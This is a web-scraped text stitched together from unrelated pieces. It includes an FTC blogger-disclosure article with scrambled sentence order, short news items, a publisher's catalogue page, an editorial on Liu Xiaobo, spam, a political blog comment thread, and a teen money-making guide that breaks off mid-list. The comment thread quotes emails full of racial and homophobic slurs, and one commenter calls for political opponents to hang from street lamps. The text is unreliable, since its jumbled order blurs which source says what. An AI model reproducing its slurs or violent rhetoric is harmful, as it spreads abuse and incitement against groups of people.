Who ’s going to be the first case ? ’’
Ryan Spaulding of Malden , who launched Ryan ’s Smashing Life music blog ( rslblog.com ) in 2006 , has no intention of complying , arguing that free CDs and show tickets are the tools of his trade .
“ I can understand the need for it , ’’ says Capone , 34 , who lives in Dracut .
She began adding disclosures in the body of reviews or in a tagline at the end of a posting as soon as the FTC guidelines were announced in October .
“ I think that some of the bloggers out there have made it bad for the rest of us by doing pay - per- post and portraying themselves as someone doing a review when it ’s really a paid ad . ’’
At the center of the issue is a question that has plagued consumers of everything from video games to weight loss products since the dawn of the Internet :
How does an average reader distinguish between credible news and paid content when anyone with cable service can set up a blog ?
Fueling the controversy over the guidelines is the fact that mainstream media such as newspapers and magazines are exempt .
Some bloggers are offended by what they perceive as an attack on their ethics .
Others acknowledge the problem but chalk it up to a few bad apples .
“ Endorsements in print ads or on television are clear , because it is obviously the company ’s advertisement , ’’ says Mary Engle , the FTC ’s associate director of consumer protection .
“ It became very clear to us when we began our regular periodic review of guides in 2007 that because of all the social media going on we ’d need to update them . ’’
Beginning today , bloggers , Twitterers , and others who write online reviews or endorse products using new media must disclose it when they receive free merchandise or payment for writing about an item .
The guidelines update the FTC ’s 1980 guide addressing the use of testimonials in advertising , remapping marketing rules for the digital realm , where it ’s hard to know if the exclamatory musings of fashion hounds and best - disposable - diaper posts by suburban moms are inspired by a great product or a free product .
Regular visitors to agirlmustshop.com may or may not have noticed that something has changed on Megan Capone ’s breezy shopping blog .
It ’s a tiny thing , really - a few words written in undersize italics at the bottom of a post praising Perricone MD skin products .
But the Federal Trade Commission expects this little sentence to have big implications for consumer protection in the Internet age :
In fact , the FTC is not going to be pursuing individual bloggers .
The agency will primarily focus on the companies and advertisers that utilize the many forms of word - of - mouth marketing to pitch products - on blogs and Facebook , with street teams , even on sites like Amazon.com that feature user reviews .
Still , much of the attention has been trained on bloggers , in particular beauty bloggers and parenting bloggers , among whose ranks the line between advertising and editorial content has grown particularly blurry .
Last year Procter & Gamble wooed 15 influential so - called mommy bloggers - who routinely receive shipments of free product samples from plush toys to strollers - with an all - expenses - paid trip to corporate headquarters , where executives solicited their feedback and touted the company ’s charitable efforts , according to a blogger who posts at lilsugar.com .
Similarly , publicists regularly deliver pricey cosmetics , skin - care products , clothing , and accessories to fashion bloggers in the hopes of generating online hype .
The bottom line ?
Readers need to understand the relationship between a reviewer and the company whose products are being reviewed .
“ The old joke is that on the Internet no one knows you ’re a dog , ’’ says Susan Getgood , a Boston - based marketing and social media consultant and cofounder of Blog With Integrity .
“ But I think that the evolving blog form has self - corrected a lot of that .
It ’s a person writing a blog , and you can attach qualities to that person .
The blog is written by people you like , people just like you , people you trust .
That ’s why it ’s so attractive from a commercial standpoint , and that ’s where the disclosure part becomes important . ’’
Getgood and several blogger friends created the Blog With Integrity pledge in July as a way for bloggers to express their commitment to an ethical code of conduct .
Christine Koh of West Medford , who blogs at bostonmamas.com , took the pledge and displays the Blog With Integrity badge on her site , where she also publishes her product review policies and procedures .
While Koh supports the FTC guidelines , she does n’t believe they are enforceable .
“ There must be millions of blogs , and that ’s impossible to police , ’’ Koh says .
“ But I think this is being touted as the education phase .
The blog space is pretty free - wheeling .
People are making it up without the benefit of a journalistic code . ’’
Yet some bloggers are crying foul because newspapers and magazines are not subject to the FTC ’s new guidelines , even on their websites .
“ There are ridiculous amounts of freebies going out to magazines , ’’ Capone says .
“ They say they keep editorial separate from advertising , but it ’s not necessarily that way .
I can understand wanting to protect consumers , but I do n’t think this is fair . ’’
The difference , according to Getgood , is that by and large readers already understand that a movie critic attends film screenings for free and that someone else paid for the travel writer ’s trip to Cancun .
“ There ’s a lot of confusion , ’’ says Getgood , who recently hosted a webinar with the FTC ’s Engle to answer the blog community ’s questions about the new guidelines .
“ It ’s not about bloggers being less ethical than journalists .
It ’s about what the consumer understands .
Most people reading a blog do n’t expect the mom writing it to be getting truckloads of Pampers delivered to her house . ’’
Joan Anderman can be reached at anderman@globe.com .
© Copyright 2009 Globe Newspaper Company .
Argentina 's capital became the first Latin American city to legalise same - sex civil unions in 2002 for gay and lesbian couples .
Four other Argentine cities later did the same , and as did Mexico City in 2007 and some Mexican and Brazilian states .
Uruguay alone has legalised civil unions nationwide .
China and Kazakhstan see this as a mutually beneficial relationship
Chinese President Hu Jintao has unveiled the Kazakh section of a 7,000 km ( 4,300 miles ) natural gas pipeline joining Central Asia to China .
Mr Hu was joined by Kazakhstan President Nursultan Nazarbayev during the inauguration in Astana on Saturday .
The pipeline is part of China 's attempts to secure more energy sources worldwide .
On Monday , Mr Hu is due to head to a commissioning ceremony in Turkmenistan where the pipeline actually begins .
He is also expected to be joined there by President Islam Karimov , the leader of Uzbekistan - the fourth country involved in the project .
' Grand project '
Mr Hu and Mr Nazarbayev together pressed a symbolic button to open the 1,833 km ( 1,139 mile ) section before officials from both countries marked the new relationship with hugs and cheers , the Reuters news agency reported .
Mr Nazarbayev said : " This is a grand construction project that will in time resurrect the ancient Silk Route . "
The pipeline , which begins near a Turkmenistan gas field being developed by the China National Petroleum Corporation concludes in Xinjiang in western China .
It has an estimated capacity of 40bn cubic metres a year and will mean the central Asian countries are less dependent on Russia buying up their supplies .
This is Kazakhstan 's first export route that does not go through Russia .
This segment cost $ 6.7bn ( £ 4.12bn ) and was completed within two years .
Most of the finance for the project came from the state - run China Development Bank .
The whole pipeline is expected to be finished by 2013 .
Welcome to OR Books A radical , exciting response to Amazonian hegemony .
— Dazed OR
Books is a new type of publishing company .
It embraces progressive change in politics , culture and the way we do business .
More
Courtesy of Eric Hanson , an illustrator whose work has appeared on the covers of a number of OR Books and in a range of our promotion material .
His portfolio can be viewed here ..
Latest News September 29 , 2020SURF , SWEAT AND TEARS longlisted for the 2020 William Hill Sports Book of the Year September 28 , 2020 NEW EVENT : THE FASCINATION OF WHAT'S DIFFICULT author Kim Bendheim in conversation with Leslie Wolf - Creutzfeldt on Thursday 10/1 September 28 , 2020 " Trump 's tax avoidance is a national disgrace .
Do n't let him blame ' the system ' " — AMERICAN MONSTROSITY author Nathan J. Robinson writes for the Guardian September 28 , 2020 " Why Does Everyone in America Think They ’re Middle Class ? " — THE SINKING MIDDLE CLASS excerpt published on Lit Hub September 25 , 2020 " Everyone 's Talking About Democratic Socialism " — AN INHERITANCE FOR OUR TIMES editors Gregory Smulewicz - Zucker and Michael J. Thompson interviewed on New Books Network
More New Titles from OR Books
Pandemic !
2 Chronicles of a Time Lost SLAVOJ ŽIŽEK Pre-order Now In this exhilarating sequel to his acclaimed Pandemic ! : COVID - 19 Shakes the World , Žižek delves into some of the more surprising dimensions of lockdowns , quarantines , and social distancing — and the increasingly unruly opposition to them by “ response fatigued ” publics around the planet .
More
We Are Millions THE COURAGE FOUNDATION Pre-order Now This book is part of the Courage Foundation ’s # WeAreMillions , an arts project demonstrating the global support for WikiLeaks publisher Julian Assange as he fights extradition to the United States .
# WeAreMillions features striking black and white images of supporters holding signs that express simply and clearly why they are standing up for Julian Assange .
The supporters are young and old , well - known and anonymous , and from all around the world .
More
The Fascination of What ’s Difficult A Life of Maud Gonne KIM BENDHEIM Pre-order Now Maud Gonne , the legendary woman known as the Irish Joan of Arc , left her mark on everyone she met .
She famously won the devotion of one of the greatest poets of the age , William Butler Yeats .
Born into tremendous privilege , she allied herself with rebels and the downtrodden and openly defied what was at the time the world ’s most powerful empire .
More
Rediscovering Earth Ten Dialogues on the Future of Nature ANDERS DUNKER Pre-order Now
The gap between what we know and what we do has haunted the field of moral philosophy since antiquity , and is at the center of today ’s environmental crisis .
Put simply : if we know that we are destroying the planet , our habitat , why do we continue to do it ?
The ten dialogues collected here investigate this question , and propose how we might salvage the planet and save our own lives .
More
Everything Must Change !
The World After Covid - 19 Edited by RENATA ÁVILA & SREĆKO HORVAT Pre-order Now Everything Must Change !
brings together prominent commentators from around the world to present a rich and nuanced weighing of progressive possibilities in the wake of the COVID - 19 pandemic .
More
The Business Secrets of Drug Dealing An Almost True Account MATT TAIBBI & “ ANONYMOUS ” Pre-order Now The Business Secrets of Drug Dealing tells the story of a hyper - observant , politically - minded , but humorously pragmatic weed dealer who has spent a working life compiling rules for how to a ) make money and b ) avoid prison .
More
American Monstrosity Donald Trump : How We Got Him • How We Stop Him NATHAN J. ROBINSON
Pre-order Now Nathan J Robinson has emerged in recent years as one of the most eloquent and engaging voices in a new cohort of young left - wing journalists who are transforming the American media landscape .
Here he sets his unsparing gaze and biting wit on the greatest grotesquery in a competitive field let loose on a hapless public by an American political system lurching out of the control of all but the super - rich : Donald J. Trump .
More
Beautiful Trouble Strategy Card Deck Pre-order Now
This box of more than 100 cards from the celebrated activist group Beautiful Trouble provides both invaluable information on the key strategies and tactics that have inspired centuries of people - powered political victories and a series of games you can play with fellow protestors .
Use the cards to learn and teach organizing , free up creativity when planning grassroots actions , or just entertain your dinner party guests .
More
Pen Pal Prison Letters from a Free Spirit on Slow Death Row TIYO ATTALLAH SALAH -EL Available Now Tiyo Attallah Salah - El died in 2018 on “ Slow Death Row ” while serving a life sentence in a Pennsylvania prison .
He was a man with a dizzying array of talents and vocations : author , scholar , teacher , musician , and activist : he was the founder of the Coalition for the Abolition of Prisons .
He was also , as is apparent from the letters that make up this book , an extraordinarily eloquent correspondent .
More
The Sinking Middle Class A Political History DAVID R. ROEDIGER
Available Now Drawing on rich traditions of radical social thought , Roediger disavows the thinly sourced idea that the United States was , for much of its history , a “ middle - class ” nation and the still more indefensible position that it is one now .
The increasing immiseration of large swathes of middle - income America , only accelerated by the current pandemic , nails a fallacy that is a major obstacle to progressive change .
More
People ’s Power Reclaiming the Energy Commons ASHLEY DAWSON Available Now People ’s Power provides a persuasive critique of a market - led transition to renewable energy .
It surveys the early development of the electric grid in the United States , telling the story of battles for public control over power during the Great Depression .
More
Pandemic !
Covid -19 Shakes the World SLAVOJ ŽIŽEK Available Now As an unprecedented global pandemic sweeps the planet , who better than the supercharged Slovenian philosopher , Slavoj Žižek to uncover its deeper meanings , marvel at its mind - boggling paradoxes , and speculate on the profundity of its consequences , all in a manner that will have you sweating profusely and gasping for breath ?
More
The Deep End The Literary Scene in the Great Depression and Today JASON BOOG Available Now It ’s tough being an author these days , and it ’s getting harder .
A recent Authors Guild survey showed that the median income for all published authors in 2017 , based solely on book - related activities , was just over $ 3,000 , down more than 20 % from eight years previously .
Roughly 25 % of authors earned nothing at all .
Price cutting by retailers , notably Amazon , has forced publishers to pay their writers less .
A stagnant economy , with only the rich seeing significant income increases , has hit writers along with everyone else .
More
War in the Age of Trump The Fall of ISIS , the Betrayal of the Kurds , the Conflict with Iran PATRICK COCKBURN Available Now In this successor to his bestselling The Rise of Islamic State , which was translated into 16 languages , and the widely - acclaimed The Age of Jihad , prize - winning foreign correspondent Patrick Cockburn provides a clear - sighted and closely - observed account of the Middle East wars conducted by Donald Trump during the first term of his presidency .
More
An Inheritance for Our Times Principles and Politics of Democratic Socialism GREGORY SMULEWICZ-ZUCKER and MICHAEL J. THOMPSON Available Now An Inheritance for Our Times is a reader that includes original essays in the form of both personal accounts and intellectual arguments from activists and theorists advocating a democratic socialist outlook .
More
Bernie ’s Brooklyn How Growing Up in the New Deal City Shaped Bernie Sanders ’ Politics THEODORE HAMM Available Now Bernie Sanders ’ tilt at the US presidency has come under fire from an establishment that derides his social democratic policies as alien to the American way .
But , as Ted Hamm reveals in this engaging and concise history , the sort of socialism Bernie advocates was commonplace in the Brooklyn where he grew up in the 1940s and 50s .
More
Tales of Two Planets Stories of Climate Change and Inequality in a Divided World JOHN FREEMAN Available Now Building from his acclaimed anthology Tales of Two Americas , beloved writer and editor John Freeman draws together a group of our greatest writers from around the world to help us see how the environmental crisis is hitting some of the most vulnerable communities where they live .
More
Lucid Dreaming Conversations with 29 Filmmakers PAMELA COHN Available Now Lucid Dreaming is an unprecedented global collection of discussions with documentary and experimental filmmakers , giving film and video its rightful place alongside the written word as an essential medium for conveying the most urgent concerns in contemporary arts and politics .
More
Two passenger ferries have collided on the Nile river in northern Egypt , triggering a large - scale rescue .
But after initial fears that many people were missing , officials later said it appeared that nobody was still unaccounted for .
One of the ferries reportedly broke in half and sank after the collision while the other overturned , near the northern city of Rashid .
It was unclear how many passengers were on the two vessels .
At least a dozen injured people were taken to hospital .
Rachid , also known as Rosetta , is a port city on the Mediterranean .
In 2006 , more than 1,000 people drowned when an Egyptian Red Sea ferry sank after a fire on board .
Gallery fails to see funny side after student puts metal pole through window as part of an art project
Does breaking a window count as art ?
Yes , murmured the 50 or so artniks who recently crowded into a former Edinburgh ambulance garage to view a film of sculptor Kevin Harman doing just that .
No , insisted Kate Gray , director of the Collective Gallery in Cockburn Street , whose window it was .
The courts are on Gray 's side .
Yesterday Harman , a prize - winning graduate of Edinburgh College of Art , was fined £ 200 for breaching the peace on 23 November , when he smashed a metal scaffolding pole through one of the gallery 's windows .
Fiscal depute Malcolm Stewart described the affair as " a rather bizarre incident " which had left Collective staff " upset . "
As Harman , 27 , had already paid £ 350 to have the window instantly replaced , his artistic intervention has proved pricey .
The Collective 's decision to prosecute was promptly condemned by Harman 's supporters .
" They should have shaken his hand and bought him a drink , " declared Royal Academician Michael Sandle .
Edinburgh art guru Richard Demarco , whose foundation recently awarded Harman a £ 2,000 scholarship , described the gallery 's action as " intensely regrettable " , and the artist as " a serious , hard - working and gifted person " .
Gray was unavailable for comment , as was the Edinburgh College of Art , where Harman is in the second year of a master 's course .
It is understood that several of his tutors had been supportive of the project , which was initially labelled Brick .
The scaffolding pole was substituted as a safer option .
The student , who has a piece in the current show of the Royal Scottish Academy , explained that he was less distressed by the fine than by the Collective 's dismissal of his work as " vandalism " , as the charge sheet put it .
" There have got to be serious questions asked of their position as arbiters of art , " he told the Guardian .
It was explained during the 15 - minute hearing that Harman had forewarned the Collective of his intentions , twice by letter and once in person , but had declined to reveal when he would strike .
" He thought the gallery were in something of a quandary about what to do , " defence lawyer Mathew Patrick told Sheriff Roderick MacLeod .
" He certainly would n't have gone ahead if he had known the police would be called . "
The idea of reconfiguring existing structures has long interested artists .
In 1978 , German sculptor Bogomir Ecker sawed 8 cm off the Eiffel Tower .
During the same decade , the American artist Gordon Matta - Clark carved up ( usually ) condemned houses in New York and Paris .
More recently , Richard Wilson has successfully distorted building facades .
Art galleries have been contaminated with mud ( Antony Gormley ) and suitcases of putrefying cheese ( Dieter Roth ) – admittedly after permission was sought .
" There has obviously been a profound level of misunderstanding of the raison d'être of Kevin 's work , " Demarco said .
" The word destruction does not apply to him .
His whole ethos is about making things which are negative into things that are positive . "
The wider world will soon be able to judge for themselves .
The film of Harman 's action has been made available , while an installation featuring the shattered window and court documents , will be unveiled in spring .
Before all that , Harman has more pressing matters to attend to : the case has left him running late with one of his essays .
Chinese leader Hu Jintao is putting Christmas to the most cynical use imaginable : jailing a prominent dissident on a holiday when most of the world 's media and government workers will be preoccupied with family and friends .
While millions of Christians are commemorating the day " grace and truth " became incarnate in Bethlehem , Liu Xiaobo will be sentenced for speaking truth to communist power .
This callous exploitation of Christmas should inspire freedom - loving people , whether Christian or not , to keep Mr. Liu and his family in their thoughts over the holiday .
Mr. Liu , a drafter of the Charter 08 manifesto a year ago calling for political reform , is so far the only one of more than 8,000 signatories to be arrested and tried for subversion .
His trial comes in the midst of an intensifying crackdown on all forms of dissent .
Mr. Liu was subjected to a two - hour " trial " yesterday — his wife , chosen lawyer and outside observers were excluded — and the verdict is due to be announced on Friday morning .
Why cite Mr. Hu , the secretary general of the Chinese Communist Party , as the ultimate culprit ?
For one thing , we know the decision on the sentencing of a dissident of Mr. Liu 's importance is made at the Politburo level .
Mr. Liu has already been in detention for a year , and his indictment was rushed through in early December to make a Christmas trial possible , as has been done with other dissidents .
A U.S. State Department spokesman rightly denounced the trial yesterday , saying that " As far as we can tell , this man 's crime was simply signing a piece of paper that aspires to a more open and participatory form of government . "
He added that such " a political trial " is " uncharacteristic of a great country . "
Alas , it 's far too characteristic of this Chinese government that still fears its own people .
61designstreet has complete solutions and services of design websites development ecommerce projects , photography , graphics , Video production at one place with best web design agency of the world for your project .
Best services for your project
READER COMMENTS ON
" Fox ' News ' Fans Flood VR With Death Threats , F - Bombs , Racist Email Following Front Page Article on ' Stop The Chamber ' Campaign "
( 31 Responses so far ... )
COMMENT # 1 [ Permalink ]
... Floridiot said on 12/11/2009 @ 4:40 am PT ...
Did n't we all know Republicans were already like that ?
Orville Redenbachers stock must be through the roof .
It 's a good thing for the American farmer , that is if the Chamber is n't letting them import all of the corn they process from Mexico .
It 's only a few haters that believe that the Chamber is on their side anyway .
Pass the popcorn , this show is just at the opening credits .
COMMENT # 2 [ Permalink ]
... Floridiot said on 12/11/2009 @ 5:16 am PT ...
This is the best , King ( R - Nut ) finds ACORN cookies are being served at the White House Christmas ball !!!
The look on his face speaks volumes
COMMENT # 3 [ Permalink ]
... Floridiot said on 12/11/2009 @ 8:37 am PT ...
... does n't he look like he just found a large turd in the official punchbowl ?
I can't quit laughing ...
COMMENT # 4 [ Permalink ]
... Ernest A. Canning said on 12/11/2009 @ 10:48 am PT ...
Is there a substantive difference between offering a reward for information leading to the arrest and conviction of a bank robber and offering that same reward for information leading to the arrest and conviction of someone who engages in , say , securities fraud ?
Perhaps our friends at Fox " News " can enlighten me , for I am having a great deal of difficulty seeing it .
COMMENT #5 [ Permalink ]
... fuzzyone said on 12/11/2009 @ 10:57 am PT ...
If you look at the list of folks on the COC 's board ( posted on VR 's site ) , you 'll see Fox Entertainment Group , a wholly owned subsidiary of Rupert Murdoch 's News Corp .
Coincidence , that they ran with this , I 'm sure .
And I 'm sure we just did n't watch long enough to see the disclosure statement on that tidbit , either .....
COMMENT #6 [ Permalink ]
... Orangutan said on 12/11/2009 @ 11:57 am PT ...
We must be hitting them where it hurts .
As they say ...
If you are taking a lot of flak that means you are over the target .
Or something like that .
Nice work Brad and the Velvet Revolution .
Senate Bill 604 is also hitting them where it hurts and has 30 co-sponsors in the Senate to perform an Audit of the Federal Reserve Bank .
Please call your Senators now and ask them to co-sponsor this bill .
And finally 9/11 Truth is making a breakthrough as 1.6 Million people tuned in to Jesse Ventura 's show on TRU TV covering the anomalies of that day .
Let 's keep the ball rolling !!
Thanks Brad .
COMMENT # 7 [ Permalink ]
... Bill Stone said on 12/11/2009 @ 12:19 pm PT ...
As a budding journalist fresh out of school many years ago I took anonymous death threats seriously .
After many years , publications and articles , I now accept them for what they are ... a badge of honor .
Great job , Brad !
COMMENT #8 [ Permalink ]
... ThePete said on 12/11/2009 @ 12:40 pm PT ...
It 's that kind of absurd , over - the - top vitriol that makes me want to not bother caring about any of this stuff .
It 's like , if these are the guys who care enough to speak up , what 's the point in even thinking we can make a difference ?
COMMENT #9 [ Permalink ]
... Shortbus said on 12/11/2009 @ 12:54 pm PT ...
" All I can say is ' Go Fuck your Mother ' .... What a pathetic left wing org this is ...... run by ... wait for it ....... Mother Fuckers ....... "
Is this Dick Cheney ?
" Here is a tip --- eat shit you fucking liberal pussy faggots .
if you nigger loving hippies ever succeed in anything to ruin this country , you will find me banging down your door to take it back .
i cannot believe how far this country has fallen when fucks like you are allowed to roam free - go back to your ghettos and hide behind the food stamp , hand out line with all your other crack whore mothers "
And this one , is this Phyllis Schafly ?
COMMENT # 10 [ Permalink ]
... slapbangwallah said on 12/11/2009 @ 3:44 pm PT ...
That 's ok .
I think all these right wing conservative Republican crazies should be hanging from street lamps for trying to destroy America .
I think we are the ones with a legitimate gripe against these traitors .
Is there a civil war coming ?
COMMENT # 11 [ Permalink ]
... Agent 99 said on 12/11/2009 @ 4:12 pm PT ...
Yes , it would be just like us to get into a civil war where a revolution is not only indicated , but long overdue .
That 's exactly right !
If the current trend of utterly demented , outright psychedelic , politics holds , you , slapbangwallah , have hit the nail slapbangwallah on the head .
Civil war is coming .
COMMENT # 12 [ Permalink ]
... Big Dan said on 12/11/2009 @ 10:32 pm PT ...
Probably half of them are astroturf shills , the other half are made up of teabaggers .
COMMENT # 13 [ Permalink ]
... Larry Bergan said on 12/12/2009 @ 12:51 am PT ...
The guys who sent the death threats must not be able to come up with any information to convict Donohue .
Other republicans in the know must be salivating over the $ 200,000 .
It would be almost sacrilegious to give up THAT kind of cash !
COMMENT # 14 [ Permalink ]
... zapkitty said on 12/12/2009 @ 1:31 am PT ...
... " Islamohitlerite " ... ?
This is all Reagan 's fault !
COMMENT # 15 [ Permalink ]
... Yankee said on 12/12/2009 @ 4:51 am PT ...
This is what happens when you argue facts , reason , and law with people who disregard facts , reason , and law .
It is pointless , and the emails should have been deleted without being read .
COMMENT # 16 [ Permalink ]
... Brooker said on 12/12/2009 @ 5:22 am PT ...
More fodder for the secret service and CIA - the list of criminals making death threats grows with each passing day .
What do these reichwing lunatics NOT get about making death threats and breaking the law .
When they 're in prison , I suppose they 'll finally get the message ?
COMMENT # 17 [ Permalink ]
... WJM said on 12/12/2009 @ 9:13 am PT ...
It just infuriates me to know that every one of these emailers is sitting in their homes complaining about how they can't find a job that will pay their bills .
And now they stand up for the very guy who is making it a personal goal to send every job that these people could have off to another country so his rich buddies can make even more money .
These people really need to get their heads out of Faux Noise 's keester .
It 's like they are demanding to keep getting screwed by the very people who have done it to them for 30 years , now .
What a shame that we do n't have some kind of accountability laws for the press .
Faux would be out of business in a heartbeat , and we could actually have an educated populace .
No one should make a living by lying a country into disaster .
COMMENT # 18 [ Permalink ]
... Tim Coney said on 12/12/2009 @ 2:38 pm PT ...
" Douche Canoes ! " -
Have to admit it , that 's one I have n't heard before and got a chuckle from it .
Come to think of it , was n't that what the Swiftboaters used ?
Douche canoes ?
COMMENT # 19 [ Permalink ]
... majii said on 12/12/2009 @ 3:38 pm PT ...
I signed the petition last week after I received their email .
One sure way to know when you 've gotten on some one 's nerves is to analyze his / her response(s ) , and these say a whole lot , all of it ugly .
One main reason I stand against folk like these is because of their rampant stereotyping .
Everyone else , except for themselves , is persona non-grata and has no redeeming qualities .
None , according to them .
Another reason I support organizations like VR is their focus on standing up for those who are unwilling or unable to stand up for themselves against those that abuse the system .
IMHO , this is what Christianity is supposed to be about with these people , but they choose the opposite in every circumstance .
Finally , I have no intention during my lifetime to see people being oppressed , and be too much of a coward to take a stand and try to end it .
These type of folks are the reason why we cannot let them back into a majority status any time in the near future .
I see them as bullies , inclined toward pitching tantrums like 2 year olds , but I also see them as extremely dangerous , and I know they are because I 've lived as a second - class citizen ( AA ) in the South among them all of my life .
And , guess what ?
The majority of them have n't changed their attitudes toward people of color , GLBTQ persons , immigrants , atheists , etc , since I was in grade school in the 1950s .
They even have some of the people in the groups they hate developing hatred toward members of the other groups .
This is just how pervasive it is , and since I know this , I 've so far not heard anything I have n't heard before from this crew .
They 'll tear this nation apart and think nothing of it as long as they are in the pilot 's seat , and after that , it 's back to running the country into the ground again .
COMMENT # 20 [ Permalink ]
... Eliz said on 12/12/2009 @ 5:33 pm PT ...
We simply have to start regulating home schooling .
This is clearly the uneducated teaching their children even less than they know .
COMMENT # 21 [ Permalink ]
... Lee R. said on 12/12/2009 @ 5:48 pm PT ...
I 'd love to know what portion of these loons really are " lone loons " who live in their own paranoid fantasy , and what portion are paid operatives .
And while I 'm wondering , I 'd love to know exactly who is paying the latter group .
COMMENT # 22 [ Permalink ]
... The Indepedent said on 12/12/2009 @ 5:52 pm PT ...
Has anyone alerted the FBI and the Secret Service about these threats ?
It does not matter whether the President is a Democrat or a Republican , is black , white , Buddhist or Christian , threats like these should be investigated and prosecuted , and any forum or message board that allows these threats against ANY elected official should be investigate and shut down quickly .
COMMENT # 23 [ Permalink ]
... zapkitty said on 12/12/2009 @ 7:09 pm PT ...
Just for fun I spent some time with Google putting " islamo " as a prefix in front of everything from " - leftist " to " - libertarian " ... but the results were only amusing if you 're into grammar done Grand Guignol .
Eliz was right about something desperately needing to be done about education ... but unfortunately Obama 's solution would be to finish Bush 's task of turning it completely over to the corporations .
Islamocoporatism ! ... stop looking at me like that .
Hmmm .... Islamopastafarianism ?
COMMENT # 24 [ Permalink ]
... njt said on 12/13/2009 @ 7:47 am PT ...
" threats like these should be investigated and prosecuted "
Should is the operative word .
Just like teabaggers can bring guns to town halls but protesters can't even stand in the streets of Pittsburgh while the WTO meets , I have a sneaking suspicion folks such as these get a pass .
COMMENT # 25 [ Permalink ]
... Lora said on 12/13/2009 @ 9:14 am PT ...
As Orangutan ( # 6 ) said ( and other similar comments ) ,
We must be hitting them where it hurts .
As they say ...
If you are taking a lot of flak that means you are over the target .
Or something like that .
Nice work Brad and the Velvet Revolution .
Seconded .
I also agree with the first part of Yankee 's ( # 15 ) comment :
This is what happens when you argue facts , reason , and law with people who disregard facts , reason , and law .
It goes to show the extent of the brainwashing they have been subjected to and how well it has taken hold .
I find it scary , and Fox Spews is responsible for a significant portion of it .
I think we have to call out and combat the disinformation , even though it takes time and energy to do so .
Kind of like having to answer a frivolous lawsuit .
If you do n't fight it , the other side automatically wins .
To let it sit is to let it fester and grow .
While most of these folks are probably harmless , there may be one or two psychowingnuts among them .
I 'm glad you 're reporting them .
Let 's continue to expose the lies and bring down the corruption .
COMMENT # 26 [ Permalink ]
... Georip said on 12/13/2009 @ 12:04 pm PT ...
I hope you will post follow up info on the responsiveness of the FBI .
I assume they will be able to trace the origin of each of the threatening emails to a computer and a person .
COMMENT # 27 [ Permalink ]
... stewart said on 12/13/2009 @ 5:00 pm PT ...
FINE BUNCH OF CANNIBALS , I SUPPOSE PITCH FORKS AND TORCHES ARENT IN VOGUE ANY LONGER THEN ?
BEWARE THE PALINISTAS SUCH AS THESE CRAZIES ILLUSTRATE WHO KNOW NO BOUNDS TO HOW FAR THEY INTEND TO GO TO EBFORCE THEIR RIGHT WING FACISM .
COMMENT # 28 [ Permalink ]
... zapkitty said on 12/14/2009 @ 3:43 pm PT ...
The description of the condition : " Islamowingnutism " : Noun , adverb " Islamowingnutist "
The practice of putting the prefix " Islamo - " in front of another word ( usually a social or religious descriptor ) in order to further denigrate whatever one is applying the descriptor to .
Wingnuts often raise their hypocrisy levels to amazing heights by claiming to not be bigoted at all while simultaneously practicing Islamowingnutism .
COMMENT # 29 [ Permalink ]
... cann4ing said on 12/14/2009 @ 9:08 pm PT ...
If ever one wanted to see the true danger in permitting demagogues like Beck , Limbaugh , O'Reilly et al dominate the airwaves , I think this piece documents it .
I 'm beginning to think the entire nation must be tilted towards Fox News .
All the loose nuts seemed to have rolled into the place .
COMMENT # 30 [ Permalink ]
... Ernest A. Canning said on 12/15/2009 @ 8:57 pm PT ...
The Indepedent said Has anyone alerted the FBI and the Secret Service about these threats ?
_________________________
If you follow the PDF link provided by Brad Friedman in the body of the article , you will see a 12/10/09 letter that was submitted by Velvet Revolution attorney Kevin Zeese to the Washington field office of the FBI and to the Justice Department .
The Secret Service only protects certain high level official --- Presidents , former Presidents , their families , etc .
The Velvet Revolution does not fall within that classification , so they would not be entitled to Secret Service protection .
COMMENT # 31 [ Permalink ]
... Groer Syck said on 12/21/2009 @ 4:06 pm PT ...
Making money online as a teenager is challenging , but with hard work , a plan , dedication , and consistency it is achievable !
Chances are that your teenage years will be full of distractions , a lot of them good and fun , but with that being said you can definitely get a head start and make some cold hard cash in your spare time .
In reality , getting started in business as a teenager , making money online will give you a head start in building a passive or active revenue stream .
It ’s 2020 and you do not need to wait for permission or a college degree to get started .
The money you earn can be used for college , future savings and any successful business can go on your resume .
Starting a business that earns some money will give you not only experience but also an advantage in a competitive job environment .
Earning money as a teenager will give you invaluable life experience about running a business , not when you are an adult , but now !
There are many ways to consider earning money now in a new business , like a part - time opportunity that still gives you great job experience while earning some extra bucks .
So do we mean getting a part - time job at the neighborhood ice cream shop or the local grocery store ?
Not exactly , though those options to earn money as a teenager are very good for some kids .
But there are many other ways to earn money that involve doing it your way , on your terms even as a teenager .
Below are some ideas for teenagers that involve a wide variety of business options .
The ideas are based on what some successful teens are already doing , and the options include everything for the detail - oriented , hands - on teen , to the tech - loving teen , and even the philanthropic type .
Rent your Video Games –
One thing all teenagers have in common is their love of video games .
With the unfortunate events of 2020 and virtually everyone around the world spending more time at home , more and more people across all age groups have been playing video games .
Not to mention , many teenagers might be tired of playing what they already own .
And adding insult to injury is the fact that video games are quite expensive and store inventories might be low with the current circumstances .
Renting your video games is a great business idea as there currently is a big opportunity for the peer - to - peer video game rental market .
Start a group on the social media platform of your choosing , set up payment options and get some flat rate envelopes from the post office , and you are on your way !
Grocery Delivery – Again , with the disconcerting pandemic events this year , grocery delivery services are in extremely high demand .
There are national services like Instacart , as well as local services offered by neighborhood store .
There may be age requirements , depending on the delivery service , and you must have access to your own car , but this grocery delivering is a great way to make money as a teenager .
Looking to start something more on your own ?
Then advertise personal grocery shopping and / or delivery options for folks in your community .
Babysitting –
An oldie but a goodie , especially during the summer months !
In most areas in the U.S. , babysitters can earn between $ 15 and $ 20 per hour .
For teenagers who have their babysitting and CPR certifications , they can expect to be paid on the higher end , but even teens without certifications are often in high demand .
Ask your parents to advertise your services on FB with their friends or on local community pages , and you can put up flyers in places where parents shop .
Depending on your age and credentials , you can join sites like – An oldie but a goodie , especially during the summer months !
In most areas in the U.S. , babysitters can earn between $ 15 and $ 20 per hour .
For teenagers who have their babysitting and CPR certifications , they can expect to be paid on the higher end , but even teens without certifications are often in high demand .
Ask your parents to advertise your services on FB with their friends or on local community pages , and you can put up flyers in places where parents shop .
Depending on your age and credentials , you can join sites like Care.com and Sittercity , which require a number of background checks , but they do the advertising for you .
Tech Support – Offer tech support and / or lessons to seniors in your community .
You ’ve probably already done a fair amount of this for family , like your parents and grandparents .
Often , the older generations need help with their computer hardware and software , cell phones , ipads and other devices .
Teaching older people who did not have the advantage of growing up with modern technology is a great way to make money .
You can drop off flyers to senior apartment buildings , senior centers or ask your grandparents if they have any friends who need help .
You can set up weekly “ lessons ” for an hourly rate or charge for as needed help desk visits .
Tutoring / Lessons –
